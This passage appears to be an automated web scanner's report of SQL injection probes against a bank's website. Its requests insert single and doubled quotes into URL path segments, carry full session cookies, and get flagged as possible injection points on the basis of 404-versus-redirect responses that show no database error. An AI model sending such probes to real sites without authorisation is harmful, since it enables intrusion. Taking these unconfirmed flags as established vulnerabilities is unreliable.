HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:57 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/about/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:59 GMT location: http://www.bbt.com/bbt/%27%27/about/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 135 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about'/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:20 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about''/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:20 GMT location: http://www.bbt.com/bbt/about%27%27/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 134 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/about/privacyandsecurity/completeclientprotection/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:41 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/about/privacyandsecurity/completeclientprotection/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:41 GMT location: http://www.bbt.com/bbt/%27%27/about/privacyandsecurity/completeclientprotection/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 191 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/privacyandsecurity/completeclientprotection/default.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about'/privacyandsecurity/completeclientprotection/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:47 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about''/privacyandsecurity/completeclientprotection/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:48 GMT location: http://www.bbt.com/bbt/about%27%27/privacyandsecurity/completeclientprotection/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 190 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/privacyandsecurity/completeclientprotection/default.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about/privacyandsecurity'/completeclientprotection/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:54 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about/privacyandsecurity''/completeclientprotection/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:54 GMT location: http://www.bbt.com/bbt/about/privacyandsecurity%27%27/completeclientprotection/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 190 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity%27%27/completeclientprotection/default.html">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about/privacyandsecurity/completeclientprotection'/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:00 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about/privacyandsecurity/completeclientprotection''/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:00 GMT location: http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection%27%27/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 190 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity/completeclientprotection%27%27/default.html">here</a>.</body>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:05 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:05 GMT location: http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 190 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity/completeclientprotection/default.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/about/privacyandsecurity/onlinebankinglogin.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:51 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/about/privacyandsecurity/onlinebankinglogin.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:51 GMT location: http://www.bbt.com/bbt/%27%27/about/privacyandsecurity/onlinebankinglogin.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 177 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/privacyandsecurity/onlinebankinglogin.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about'/privacyandsecurity/onlinebankinglogin.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:11 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about''/privacyandsecurity/onlinebankinglogin.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:11 GMT location: http://www.bbt.com/bbt/about%27%27/privacyandsecurity/onlinebankinglogin.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 176 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/privacyandsecurity/onlinebankinglogin.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about/privacyandsecurity'/onlinebankinglogin.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:37 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about/privacyandsecurity''/onlinebankinglogin.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:38 GMT location: http://www.bbt.com/bbt/about/privacyandsecurity%27%27/onlinebankinglogin.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 176 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity%27%27/onlinebankinglogin.html">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/about/privacyandsecurity/onlinebankinglogin.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:46 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/about/privacyandsecurity/onlinebankinglogin.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:47 GMT location: http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 176 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity/onlinebankinglogin.html%27%27">here</a>.</body>
